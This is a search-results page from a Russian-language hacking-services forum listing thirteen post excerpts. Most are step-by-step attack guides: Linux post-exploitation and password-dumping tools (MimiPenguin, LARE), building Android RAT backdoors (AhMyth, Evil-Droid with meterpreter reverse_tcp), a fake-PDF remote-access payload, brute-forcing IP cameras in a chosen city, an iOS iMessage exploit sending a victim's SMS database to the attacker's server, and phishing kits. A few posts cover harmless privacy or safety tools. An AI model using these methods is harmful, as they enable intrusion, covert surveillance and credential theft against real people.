Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'программа для взлома'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Admin
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 13 results

  1. Пост-эксплуатация в практике пен-теста Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений. Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы. 1. PXEenum — полное перечисление всего что есть в системе Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время. Для запуска он не требует прав root’а, работает в стандартном терминале. # wget //raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh Установка: # git clone //github.com/shawnduong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh 2. MIDA Multitool — палим систему по взрослому Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно: SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д. Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев. Устанавливаем скрипт в систему с github: # git clone //github.com/NullArray/Bash-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh Запускаем скрипт: # /.bashkit.sh Дело сделано! Можно запускать в системе! 3. MimiPenguin — тырим пароли без зазрения совести Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей) Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux. Устанавливаем MimiPenguin забирая его с репозитория GitHub: # git clone //github.com/huntergregal/mimipenguin # cd mimipenguin # ls –a # chmod +x mimipenguin.sh # ./mimipenguin.sh 4. LARE — ломимся под рута используя баги ядра И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8. Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP. Устанавливаем скрипт в систему: # git clone //github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a Запуск скрипта на целевой машине в сети # LARE.sh -l [Attackers-IP] Запуск на машине с подключением к базе данных эксплойтов на GitHub # LARE.sh -l or ./LARE.sh -l Проверка и защита системы от техник пост-эксплуатации Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-day или устаревший софт.
  2. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как в калькуляторе можно создать двойное дно. Существует такое приложение, которое при открытии будет выглядеть как обычный калькулятор, но если ввести на нем определенное число, откроется потайное хранилище, где можно спрятать фотографии, видео, заметки и даже пользоваться секретным браузером. Калькулятор Photo Vault (https://play.google.com/store/apps/details?id=com.hld.anzenbokusucal) - для Android или Calculator# (https://apps.apple.com/gb/app/calculator-hide-photos-videos/id1165276801) для iOS, и применений ему может быть много: от простой защиты личных фото от лишних глаз, до скрытия файлов, например при досмотре смартфона таможенниками. При первом запуске вас попросят установить пароль, после чего необходимо задать секретные вопросы и указать почту для восстановления данных в случае утери PIN-кода. В настройках вы также можете создавать резервные копии, изменять внешний вид калькулятора, менять метод шифрования и восстанавливать утерянные файлы. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как взломать и управлять смартфоном удаленно. AhMyth RAT - это приложение с открытым исходным кодом, доступное только в бета-версии. Инструмент нацелен на пользователей Windows, но шрифты AhMyth также можно загрузить с GitHub для UNIX-подобных платформ, отмечают эксперты по мобильному взлому. Установка: Устанавливаем Java Скачиваем AhMyth RAT Создаём вредоносный APK: Чтобы создать файл APK для Android, откройте вкладку APK Builder. В поле IP-адреса источника необходимо ввести IP-адрес атакующей машины. В поле Source port вы можете указать порт, который машина зарезервирует для прослушивания соединений (порт по умолчанию - 42,474). Затем нажмите кнопку «Создать»; по умолчанию зараженный файл сохраняется в следующей папке: C:UsersAhMythOutput Готово! Теперь осталось отправить жертве данный APK файл. Вот таким простым способом вы можете взломать и получить полный доступ над каким-либо смартфоном, поэтому пользуйтесь пока данный метод работает. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно взломать ПК при помощи PDF-файла. Так как данный формат имеет множество уязвимостей, в него легко можно "вшивать" различное вредоносное программное обеспечение. Сегодня же мы будем применять автоматизированный фреймворк Insanity Framework, который позволяет создать зараженный PDF-файл, позволяющий реализовать удаленный доступ к ПК под управлением систем Windows. Погнали! 1. Для установки используем: git clone https://github.com/4w4k3/Insanity-Framework $ cd Insanity-Framework $ chmod +x insanity.py $ ./install.sh 2. Для использования нужно ввести следующую команду: sudo python2 insanity.py В момент первого запуска устанавливаются все необходимые зависимости и открывается главное меню. В главном меню нужно выбрать первый пункт, который позволяет создавать полезную нагрузку. Затем нужно выбрать Fake Acrobat PDF. Ввести ip адрес и порт. Это отличный и эффективный метод взлома практически любого компьютера, а самое главное, что при должной сноровке он становится очень трудно обнаружимым. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. Приветствую, хакеры! В данной статье я хочу рассказать про очень мощный инструмент для DNS-разведки. DNSRecon, как его называют сегодня, представляет собой Python-эквивалент скрипта Ruby, первоначально написанного Карлосом Пересом в конце 2006 года. По его собственным словам, этот инструмент в значительной степени возник из его личной потребности отражать сбор данных, связанных с DNS, в интуитивно понятном виде. В то время как версия Python позволила ему попрактиковаться в вновь приобретенных навыках работы с языком программирования. Установка: Установите пакет git, если он недоступен (например, sudo apt install git) и python3-pip для выполнения требований к управлению пакетами для Python. Клонируйте исходный архив в желаемое место на диске: git clone https://github.com/darkoperator/dnsrecon.git python3-pip install -r requirements.txt --no-warn-script-location python3 dnsrecon.py -h Очень простой в освоении инструмент, поэтому если вам необходимо работать с DNS, то рекомендую пользоваться этой утилитой. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Приветствую, хакеры! В данной статье я хочу рассказать о том, кто следить за вами через веб-камеру. Наверняка ни для кого не секрет, что сегодня корпорации и злоумышленники могут получить доступ к вашей веб-камере для тайной слежки в своих целях. Утилита Procesed Explorer от поможет избавиться от опасности. Использование: Скачиваем и запускаем утилиту от имени администратора. Находим имя веб-камеры: «Пуск» → «Диспетчер устройств» → «Устройства обработки изображений» → щелкаем по названию камеры в списке → «Свойства» → «Сведения» → «Свойство» → «Имя объекта физического устройства» → «Значение» → «Копировать». Нажимаем Process Explorer на панели задач → «Find» → «Find Handle or DLL…» → щелкаем правой кнопкой мыши в поле «Handle or DLL substring» → «Вставить» → «Search». Появится список процессов, использующих веб-камеру. Найдите соответствующий процесс в списке главного окна Process Explorer, щелкните правой кнопкой мыши по неизвестному процессу, нажмите «Properties». В примере камеру использует только Skype. Чтобы завершить слежку, нажмите «Kill Process» и «ОК». Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  7. Приветствую, хакеры! В данной статье я хотел бы поделиться вам с данным списком необходимых онлайн ресурсов, благодаря которым ты можешь проверить любой файл, полученный из недостоверного источника. А так же другой дополнительный материал, с помощью которого ты обезопасишь себя от фишинга. Советую всегда пользоваться данным ресурсами, так ты сможешь быть всегда в безопасности и быть уверенным в том, чем ты пользуешься. • Дешифроторы коротких URL-ссылок для проверки на фишинговый сайт: http://www.untinyurl.com http://checkshorturl.com https://unshorten.me/ • Онлайн песочницы: https://threatpoint.checkpoint.com/ThreatPortal/emulation http://www.cpcheckme.com/checkme https://www.hybrid-analysis.com https://cuckoo.cert.ee https://any.run • Онлайн-антивирусы: https://www.virustotal.com/ru/ https://online.drweb.com/ • Проверка анонимности web-серфинга: https://proxy6.net/privacy http://proiptest.com/test/ Это наименьшее, что вы можете сделать для своей безопасности, но это уже будет большим плюсом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  8. AlwaysOnline Telegram — держи свой Telegram всегда в сети! Скрипт периодически отправляет сообщение об онлайн-статусе, тем самым поддерживая Вам статус "В сети". Его работа никак не влияет на использование аккаунта. Инструкция 1. Скачиваем Python (клик)При установке выбираем пункт "ADD TO PATH"; 2. Устанавливаем Telethon. Выполняем эту команду в командной строке: pip3 install telethon==0.19.1.6 На других версиях библиотеки скрипт может не работать. В случае, если у вас уже установлен Telethon, но другой версии, сначала Вам потребуется его удалить с помощью команды: pip3 uninstall telethon 3. Далее, для работы нам нужно получить API ID и API Hash. Переходим на my.telegram.org -> Проходим авторизацию -> После успешной авторизации переходим в раздел "API development tools" -> Создаем новое приложение, вписываем любое название и короткое имя -> Попадаем на страницу, где видим наши API ID и API Hash -> Копируем их; 4. Нам нужно указать полученный API ID и API Hash в скрипте. Для этого открываем файл data.py любым текстовым редактором и заменяем значения на свои; 5. Запускаем main.py. В случае, если у Вас включена двухфакторная авторизация, вводим пароль от нее на этом этапе. Если нет - просто нажимаем Enter. Обратите внимание, что процесс введения пароля не отображается - это нормально. Далее вводим Ваш номер телефона, вводим, полученный в приложении Telegram код; 6. Поздравляю, вы великолепны! Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
  9. Приветствую, хакеры, в данной статье я решил поделиться списком, в который пошли самые эффективные сервисы-анонимайзеры! Некоторые из представленных вариантов платные, что однако не заставляет отказаться от их использования. Итак, приступим: 1. STZBlaster - ТЫК - данная прога позволит вам изменить имена, начиная от имени ПК, хоста, и заканчивая ID процессора. Также, позволяет изменить региональные настройки. Будьте осторожны при изменении MAC настроек, они могут негативно отразится на работе вашей системы. 2. RMOSChange - ТЫК - интересная програмка для смены HTTP-заголовков браузеров. Данная прога может пригодиться вам для смены языковых норм браузера, его местонахождения, а также для подмены user-agent, что позволит вам беспрепятственно заходить на сайты других стран и регионов. 3. SMAC 2.0 - ТЫК - сие чудо позволяет менять MAC адрес сетевой платы, раз в месяц. 4. Privacy Suite Main Menu - ТЫК - программа для сейва крипты в созданные контейнеры jpg, wav файлы, для усложнения их обнаружения. Еще прога позволят переносить крипту на флешку. Контейнер с шифром можно открыть уже без использования данной проги. 5. TrueCrypt - ТЫК - одна из лучших программ для шифрования важной информации. 6. Proxyfier - ТЫК - проксификатор с возможностью задать приложение, которое будет соксифицировано. 7. OpenVPN GUI - ТЫК - один из самых эффективных VPN сервисов. 8. VPSProxy - ТЫК - тоже отличный VPN, с постоянно меняющимися серверами, что позволяет вам наиболее эффективно скрывать себя в сети. 9. O&O SafeErase - ТЫК - программа, для безвозвратного удаления файлов с вашего ПК.
  10. Сначала разберёмся какие типы видов камер бывают: IP камеры - это камеры к которым можно подключиться через интернет. (Работают с интернетом Локальные камеры - это камеры к которым невозможно подключиться через интернет. Они никак не будут задействованы в интернет. (Работают без интернета) Теперь я вам покажу и расскажу как находить IP камеры. Для начала нам понадобиться необходимый софт для брута, чека и просмотра. Сперва нам нужно будет скачать архив. Там весь необходимый софт для работы. Если же вы не хотите скачивать мой архив со сборником программ, тогда в путь за поиском необходимых программ ! Скачиваем архив: СКАЧАТЬ KPortScan - https://www.virustotal.com/gui/file...434032842339f0ba38ad1ff62f72999c4e5/detection iVMS-4200 - https://www.virustotal.com/gui/file...379b736524606fc52e7fc27b978f13c749b/detection HIKKA - https://www.virustotal.com/gui/file...ecc27f76bd501d73b1265021069e653c1ba/detection Внимание! Перед распаковкой отключите антивирус и добавьте KPortScan в исключения. Так как именно на него антивирус ругается. Вирусов нету Распаковываем архив в любую папку. И нас встречают 3 программы. Что они делают эти три программы ? KPortScan - Брут IP камер HIKKA - Чек IP камер iVMS-4200 - Просмотр IP камер Что такое брут и чек? Брут (Brute) - Добыча чего-либо Чек (Check) - Проверка чего-либо (в данном случае проверка с помощью логина и паролей) Сперва нам нужно открыть сайт. Вот он: https://4it.me/getlistip Вписываем туда город, который хотим взломать на камеры! В моём случае например это будет российский город "Тверь" Копируем IP-диапазоны, и открываем KPortScan и вставляем туда скопированные IP-диапазоны. В списке выбираем "RUSSIAN FEDERATION" Далее в "Port" пишем значение "8000" И нажимаем кнопку "Start" Внимание! Перед тем как нажимать кнопку "Start", сверьтесь со скрином как у меня, чтобы у вас потом не возникло ошибок! Как сверили свои значения с моим скрином, чтобы они совпадали, смело нажимаем на кнопку старта! Ну и теперь осталось дождаться окончания чека. При чеке интернет у вас будет нагружен довольно сильно. Так что приготовьтесь к этому испытанию) После завершения и вас будет отображено количество найденных IP камер. Закрываем KPortScan и открываем файл results.txt Там будут найденные камеры. Копируем все найденные камеры из файла results.txt и открываем папку с программой под названием "HIKKA" Открываем файл "hosts" и скидываем скопированные камеры туда. Сохраняем и запускаем файл "start.bat" Теперь ждём когда будет зелёная строка, это будет означать что камера найдена! Пример найденной камеры: Как только HIKKA нашла камеру, идём устанавливать программу "iVMS-4200" Кстати, чуть не забыл, когда HIKKA нашла камеру, в папке pics будут фотки самой камеры, а в названии данные об камере. Как только установили программу "iVMS-4200", открываем. Если у вас английский язык, то нажимаем вверху "Help->Language->Русский Далее открываем вкладку "Управление устройством" и нажимаем на кнопку "Добавить" Вводим любой псевдоним. Вводим адрес (пример: 91.238.24.219) Вводим пользователя и пароль Если вы запутались, то сверьтесь как у меня на скрине: После ввода необходимых данных нажимаем на кнопку "Добавить" После успешного импорта камеры, переходим во вкладку "Основной ракурс" И видим что появилась новая папка с вашим псевдонимом камеры. Открываем папку, и нажимаем на камеру 2 раза левой кнопкой мыши, или же просто перетягиваем камеру чуть правее. Ну вот и всё! Что делать дальше вам решать.. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  11. Приветствую хакеры, наверно каждый из вас хоть раз хотел взломать смартфон, удалённо прослушивать разговоры, просматривать SMS и т.д. И это вполне возможно сделать. В этой статье я вам расскажу и покажу (скриншоты), как можно получить доступ к Android-смартфону. Кое-что об Android Начну с того, что что Android является ОС на базе ядра Linux, а это много чего означает. Все возможности, которые у вас есть на десктопной версии, есть и на андроид смартфонах. Тут дело в удобстве. Взлом андроид смартфона не сложнее чем взлом операционной системы, будь-то Linux или Windows. Всегда можно загрузить вредоносное приложение, через которое мы откроем бэкдор и сможем войти в систему удалённо. Есть также возможность прослушивать телефон через открытые порты. Таким вариантом мы сегодня и воспользуемся. Итак, начнем! Для взлома нам для этого понадобится: Скрипт Evil-Droid; Открытый порт; ПК с установленным Kali Linux или загрузочная флешка. Взлом андроид смартфонов – установка и запуск компонентов Скачиваем архив или копируем его через терминал в необходимое место. git clone https://github.com/M4sc3r4n0/Evil-Droid.git Далее переходим в папку и даём права на исполнение файлу evil-droid chmod +x evil-droid Запускаем скрипт и генерируем вредоносный apk с бэкдором sh evil-droid Генерировать можно как файл под номером 2, так и 3. Я пользуюсь третьим, версия подойдёт для андроид устройств с более хорошей безопасностью. Для смартфонов с версией андроид 3-5 подойдёт и 2 пункт. Перед нами появилось меню для настройки apk, которым мы будем пользоваться для взлома андроид. Пункты, которые нам нужно настроить: ip-адрес – на выбор локальный и глобальный, используйте глобальный, если атакуемый смартфон будет не у вас в локальной сети. set lport – установка порта, тут вы можете выбрать любой, главное чтобы он был открыт. Иначе прослушать смартфон не получится. Как просканировать порты в вашей сети – читать. Метод прослушки – я рекомендую использовать android/meterpreter/reverse_tcp, так как мы будем использовать metasploit для управления. Выбор папки, куда будет сгенерирован вредоносный apk. Генерация вредоносного apk. Всё сделано. Для того, чтобы произошел взлом андроид смартфона и вы могли им управлять, необходимо установить evilapk на атакуемый смартфон. Тут методов много и придётся использовать СИ. Далее мы запускаем скрипт ещё раз и выбираем пункт – start listening. Зараженный смартфон появиться в списке и в открытом окне появится возможность ввести команды управления. Для того, чтобы получить их список воспользуйтесь параметром –help или -h (идентичны). Для лучшего восприятия процесса взлома прикрепляю скриншоты Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  12. Привет, хакеры, в данной статье поговорим о взломе IOS Введение. С недавних пор Apple обновила свою платформу до версии 12. Данная уязвимость была обнаружена в мае 2019 года специалисткой из команды Google Project Zero. исследовательница работает только на iOS 12. И описан как: Простая демонстрация достижимости класса в Springboard. Реальные последствия [эксплуатации] бага, скорее всего, будут куда серьезнее. Но давайте углубимся в это и узнаем о роствениках данной уязвимости. А именно: CVE-2019-8660 CVE-2019-8647 Первый вид представляет собой некий баг в Core Data позволяющий вызвать неожиданное завершения приложения. В худшем случае запустить произвольный код на iPhone 5s и выше. Вторая же недоработка аналогична первой, но позволяет выполнить произвольный код и представляет собо use after free уязвимость. И происходит все это на том же iPhone 5s. Проникновение Выше была у нас теория. Переходим к практике. Данная уязвимость позволит нам получить доступ к галереи телефона и смс-сообщениям. Приступим. Что нужно: Виртуальная машина (Операционка macOS, версия Mojave 10.14) iPhone для тестирования Фреймоворк Frida Подготовка виртуалки: Запускаем машину После зажимаем Win+R Пишем csrutil disable Этими дейстиями мы отключили System Integrity Protection. Он не дает нам установить hook на сервис с названием "imagent". Он в свою очередь отвечает за работу программ таких как: FaceTime, iMessages. Подготовка программ: Для начала перезагрузим виртуальную машину. После переходим на сайт и регистрируемся, чтобы скачать файл. Далее нам нужно открыть наш архив (messageleak.zip) и увидить вот такой содержательный контент: MD5 (injectMessage.js) = d922afbf15661ce700f7cbf2cc660657 MD5 (myserver.py) = 3c78673f4953a078c75ce9ced903595d MD5 (obj_db) = f96f64ac54c4e2d667d2b0afff25dff9 MD5 (obj_imgdump) = fdc01461eb9f3b09781550e679710adb MD5 (sendMessage.applescript) = 074dc419a5383ebb3bb3d67f83798e0a MD5 (sendMessage.py) = f63b8869e818fdbccc8abab6cdba5a57 MD5 (uni.py) = 754ad573e3aeff1edab103e1fe5175c0 Теперь вносим правки в скрипт sendMessage.py. Объясняю почему. Там содержится Apple ID нашей жертвы (receiver). Данная команда выглядет так: receiver = "TARGET" Теперь меняем значение TARGET на телефон жертвы или почту. Получается это примерно так: receiver = "[email protected]" После заходим в файл injectMessage.js и меняем содержимое. Мы будем получать базу смс сообщений. Для этого воспользуемся нагрузкой obj_db. Исходный код без изменений выглядет так: var d = ObjC.classes.NSData.dataWithContentsOfFile_("FULL PATH HERE/obj"); Мы его преобразуем и получаем вот это: var d = ObjC.classes.NSData.dataWithContentsOfFile_("/Users/admin/Desktop/obj_db"); После в той же нагрузке obj_db меняем natashenka.party на адрес вашего сервера. Для получения ответа от нашего эксплоита. Последнии штрихи: Переходим к нашей программе Frida. Скачиваем ее с сайта (frida-server-12.6.12-macos-x86_64.xz). После запускаем: MD5 (frida-server-12.6.12-macos-x86_64.xz) = b58f4c7ed17c23a88e9a46620645f1d4 И пишем следующие команды: chmod +x frida-server-12.6.12-macos-x86_64 ./frida-server-12.6.12-macos-x86_64 -l 0.0.0.0 -v sudo easy_install pip pip install frida-tools --user И теперь запускаем: python sendMessage.py В ходе работы будут запросы. Их мы разрешаем и ждем результатов, которые придут к вам на сервер. Я никого ни к чему не призываю, статья написана в ознакомительных целях!
  13. Привет, хакеры, в данной статье немного поговорим о фишинге социальный сетей. Предупреждаю, что статья несет цель лишь обозрить подобные процессы, для улучшения вашей же безопасности. Меню Работа в данной программе предельно проста и разобраться с ее управлением не сложно, несколько проблем рассмотрим дальше. Данный софт спредоставляет множество различных сайтов, однако выбор падет на гитхаб. Следующий пункт Есть два варианта на выбор: Serveo и Ngrok - хосты, на которых разместится сайт. Первым делом необходимо запустить в локальной сети, после в зависимости от выбранного варианта выбирается хост. Какой лучше выбрать? Лично я рекомендую использовать ngrok, легкий в управлении Ответ программы В строке “Send this link to the Victim” и будет написанная ссылка, которая ведет на фишинговый сайт. Она не красивая, но зато абсолютно бесплатно и быстро. Дальнейшей целью является отправление ссылки жертве. Работоспособность Переходим по ссылке и проверяем ее. Вводим данные и нажимаем на “Sign in” Далее, переходим в программу и наблюдаем данные для входа: логин и пароль. Данные получены. Заключение По щелчку пальца невозможно получить любые данные, однако используя эту информацию и навыки социальной инженерии, можно получить необходимую информацию.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.